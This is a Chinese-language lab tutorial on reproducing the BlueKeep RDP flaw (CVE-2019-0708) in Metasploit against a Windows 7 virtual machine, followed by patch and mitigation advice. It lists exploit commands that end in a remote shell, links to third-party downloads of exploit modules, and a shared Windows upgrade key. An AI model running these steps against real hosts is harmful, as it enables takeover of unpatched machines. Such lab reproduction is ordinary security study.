CVE-2019-0708 RDP MSF漏洞復現
漏洞環境
使用 VMware 安裝Windows7 X64 模擬受害機
Windows7 X64下載鏈接:鏈接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取碼: fiwx
EXP
kali msf 攻擊准備:
1,metasploit-framework, kali msf 需更新到最新版本,如果正常打開輸入:msfupdate 進行更新,如果啟動msf報錯,可以卸載重新安裝:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
2,MSF 下載 Reference 中的攻擊套件放置文件到msf的相應文件夾(如果已存在同名文件,直接覆蓋即可) 。
鏈接: https://pan.baidu.com/s/1m1N0RLBhLRTMLy56DFke-g 提取碼: kw7b
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
window7 X64 攻擊准備:
1,如果下載到的Win7 X64是家庭普通版,是需要升級到旗艦版或者專業版,因為家庭普通版是沒有遠程連接這個功能的。
點擊開始,找到Windows Anytime Upgrade
這里輸入密鑰:6K2KY-BFH24-PJW6W-9GK29-TMPWP
下一步 ,驗證密鑰,等待驗證密鑰。如果密鑰驗證成功,會出現請接受許可條款,如果密鑰驗證不成功,則下面的步驟不可用,那可以返回,重新在網上找升級密鑰,直至密鑰驗證成功。點我接受,升級系統大概花10分鍾的時間,聯網升級,在升級過程中,電腦會重啟數次,認真等待。
2,開啟3389端口,允許遠程桌面連接;修改高級共享設置,默認是關閉的;
啟動遠程桌面服務,默認是禁止的;
修改防火牆設置,增加一條允許連接tcp 3389端口的出站入站記錄;
這樣就可以開啟遠程連接了,一般是允許遠程桌面連接和啟動遠程桌面服務就可以了,如果仍然不行的話就把上面的准備全部操作一遍。
進行攻擊:
使用 msfconsole 進入 metasploit-framework
進入以后使用 reload_all 重新加載 0708rdp 利用模塊
使用 use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 啟用 0708RDP 攻擊模塊
使用 show options 查看相關信息和設置
關鍵設置主要為 RHOSTS / RPORT / target
set RHOSTS 受害機IP設置受害機IP
set RPORT 受害機PORT設置受害機RDP端口號
set target ID數字(可選為0-4)設置受害機機器架構
使用的是VMware,那么 target 2 滿足條件
使用 exploit 開始攻擊,等待建立連接
建立連接以后,使用 shell
獲得shell,再使用 python
獲得交互式 shell
完成攻擊,成功拿到受害者主機權限。
打完收工。
Reference
https://github.com/rapid7/metasploit-framework/pull/12283/files
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取碼: fiwx
https://pan.baidu.com/s/1m1N0RLBhLRTMLy56DFke-g 提取碼: kw7b
參考自清水師傅的文章(https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961)
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
修復方法:微軟已經於2019年05月4日發布了漏洞補丁,請進行相關升級:https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EWIAC
Windows XP 及Windows 2003可以在以下鏈接下載補丁:https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708
臨時解決方案
1、如暫時無法更新補丁,可以通過在系統上啟用網絡及身份認證(NLA)以暫時規避該漏洞影響。
2、在網絡外圍防火牆阻斷TCP端口3389的連接,或對相關服務器做訪問來源過濾,只允許可信IP連接。
3、禁用遠程桌面服務。